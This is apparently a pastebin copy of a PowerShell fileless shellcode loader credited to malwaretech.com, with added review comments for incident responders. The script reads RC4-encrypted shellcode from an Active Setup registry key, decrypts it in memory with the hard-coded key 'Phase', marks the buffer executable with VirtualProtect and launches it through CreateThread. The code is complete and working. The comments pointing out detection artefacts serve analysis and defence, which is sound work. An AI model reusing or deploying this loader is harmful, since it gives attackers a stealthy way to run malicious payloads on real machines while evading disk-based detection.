
Phase PowerShell Script

a guest Dec 11th, 2014 1,175 Never
  1. # Read And Execute Rc4 Encrypted ShellCode From The Registry
     #
     # NOTE(review): this is a fileless in-memory loader. Nothing executable is
     # written to disk: the payload is stored as two binary registry values under
     # the key below, is RC4-decrypted in-process with the hard-coded key "Phase",
     # and is started on a new thread through P/Invoke into kernel32. For
     # responders the observable artefacts in this listing are therefore the
     # registry key and value names (Rc4Encoded64 / Rc4Encoded32), the runtime
     # Add-Type compilation of CreateThread / VirtualProtect / WaitForSingleObject,
     # and the script text itself where PowerShell script-block logging is enabled.
  2.  
  3. # Set Registry Key
     # The GUID subkey under Active Setup\Installed Components holds the encrypted
     # payload. Active Setup is widely documented as an auto-run location, but this
     # script only reads from it; how the values were written is outside this listing.
  4. $sRegistryKey = 'HKCU:\Software\Microsoft\Active Setup\Installed Components\{72507C54-3577-4830-815B-310007F6135A}';
  5.  
  6. # Set Key For Key Stream
     # The RC4 key is the literal ASCII string "Phase". Because the key is in the
     # clear, the stored blobs can be decrypted offline for analysis with the same
     # key-schedule/PRGA routine used below (RC4 is symmetric).
  7. [Byte[]]$bKey = [System.Text.Encoding]::ASCII.GetBytes("Phase");
  8.  
  9. # Import Native Functions
     # C# P/Invoke declarations compiled at runtime by Add-Type (below). Note the
     # non-standard signatures: CreateThread's lpStartAddress and VirtualProtect's
     # lpAddress are declared as Byte[] so a managed byte array can be passed
     # directly as the code address / region to change.
  10. $sCode = @"
  11. [DllImport("kernel32.dll")]
  12. public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, Byte[] lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  13. [DllImport("kernel32.dll")]
  14. public static extern bool VirtualProtect(Byte[] lpAddress, uint dwSize, uint flNewProtect, [Out] IntPtr lpflOldProtect);
  15. [DllImport("kernel32.dll")]
  16. public static extern uint WaitForSingleObject(IntPtr hHandle, int dwMilliseconds);
  17. "@
  18.  
  19. # Make The Code Recognized By PowerShell
     # Add-Type -MemberDefinition invokes the C# compiler at runtime; the resulting
     # type is in-memory only, but the compiler invocation itself is observable on
     # the host. NOTE(review): temp-file artefacts depend on the PowerShell/.NET
     # version in use — confirm on the target platform.
  20. $pFunctions = Add-Type -memberDefinition $sCode -Name "Win32" -namespace Win32Functions -passthru
  21.  
  22. # Declare Shellcode Array
  23. [Byte[]]$bShellCode;
  24.  
  25. # Check Pointer Size To Check If x64
     # Pointer size 8 means a 64-bit PowerShell host, so the 64-bit blob is
     # selected; otherwise the 32-bit blob. Both values are read from $sRegistryKey.
  26. if ([IntPtr]::Size -eq 8) {
  27.         # Load Encrypted x64 Shellcode From Registry
  28.         $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded64).Rc4Encoded64;
  29. }else{
  30.         # Load Encrypted x86 Shellcode From Registry
  31.         $bShellCode = (Get-ItemProperty -Path $sRegistryKey -Name Rc4Encoded32).Rc4Encoded32;
  32. }
  33.  
  34. # Define Byte Arrays That Are The Boxes
     # RC4 state: $s is the 256-byte permutation S, $k is the key repeated to 256 bytes.
  35. [Byte[]]$s = New-Object Byte[] 256;
  36. [Byte[]]$k = New-Object Byte[] 256;
  37.  
  38. # Loop from 0 to 255 to fill the boxes
  39. for ($i = 0; $i -lt 256; $i++){
  40.         # Fill Box S With 0-255 (identity permutation)
  41.         $s[$i] = [Byte]$i;
  42.        
  43.         # Fill Box K With the key repeated: K[i] = key[i mod keyLen]
  44.         $k[$i] = $bKey[$i % $bKey.Length];
  45. }
  46.  
  47. # Initialize j
  48. $j = 0;
  49.  
  50. # Loop Through All 256 Bytes
     # RC4 key-scheduling algorithm (KSA): permute S under the control of K.
  51. for ($i = 0; $i -lt 256; $i++){
  52.         $j = ($j + $s[$i] + $k[$i]) % 256;
  53.        
  54.         # Hold Temporary Value Of S[i] For Swapping
  55.         $bSwap = $s[$i];
  56.        
  57.         # Set S[i] With S[j]
  58.         $s[$i] = $s[$j];
  59.        
  60.         # Set S[j] With Old Value Of S[i]
  61.         $s[$j] = $bSwap;
  62. }
  63.  
  64. # Initialize i
  65. $i = 0;
  66.  
  67. # Initialize j
  68. $j = 0;
  69.  
  70. # Loop Through The Bytes In The Buffer
     # RC4 pseudo-random generation algorithm (PRGA): one key-stream byte per
     # payload byte, XORed in place, so $bShellCode holds plaintext afterwards.
  71. for ($x = 0; $x -lt $bShellCode.Length; $x++){
  72.         # Pseudo-Random Generation Algorithm
  73.         $i = ($i + 1) % 256;
  74.         $j = ($j + $s[$i]) % 256;
  75.        
  76.         # Hold Temporary Value Of S[i] For Swapping
  77.         $bSwap = $s[$i];
  78.        
  79.         # Set S[i] With S[j]
  80.         $s[$i] = $s[$j];
  81.        
  82.         # Set S[j] With Old Value Of S[i]
  83.         $s[$j] = $bSwap;
  84.         [int]$t = ($s[$i] + $s[$j]) % 256;
  85.        
  86.         # Xor Ciphertext Byte With KeyStream Byte S[t]
  87.         $bShellCode[$x] = $bShellCode[$x] -bxor $s[$t];
  88. }
  89.  
  90. # Check What Size We Should Allocate
  91. $dwSize = $bShellCode.Length;
  92.  
  93. # Check Size Of ShellCode
     # Only proceeds when a payload was actually read from the registry.
  94. if ($dwSize -gt 0x00000000){
  95.         # Variable To Hold Old Protection Flags
  96.         [Int[]]$dwOldProt = 0x00000000;
  97.  
  98.         # Get Pointer To $dwOldProt
  99.         $pdwOldProt = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($dwOldProt,0)
  100.  
  101.         # Set Read/Write/Execute Flags On ShellCode
             # 0x40 is PAGE_EXECUTE_READWRITE: the managed byte array backing the
             # decrypted payload is made executable in place (no separate
             # VirtualAlloc). A RWX protection change on a heap region inside a
             # PowerShell process is the behavioural signal here.
  102.         if ($pFunctions::VirtualProtect($bShellCode, $dwSize, 0x40, $pdwOldProt)){             
  103.                 # Create A New Thread To Execute Our ShellCode
                     # Thread start address is the array itself; all other
                     # arguments are 0/NULL (default stack, run immediately).
  104.                 $hThread = $pFunctions::CreateThread(0, 0, $bShellCode, 0, 0, 0);
  105.                
  106.                 # Wait For Our Thread
                     # -1 is INFINITE, so the script blocks until the thread exits.
  107.                 $pFunctions::WaitForSingleObject($hThread, -1);
  108.         }
  109. }
  110.  
  111. www.malwaretech.com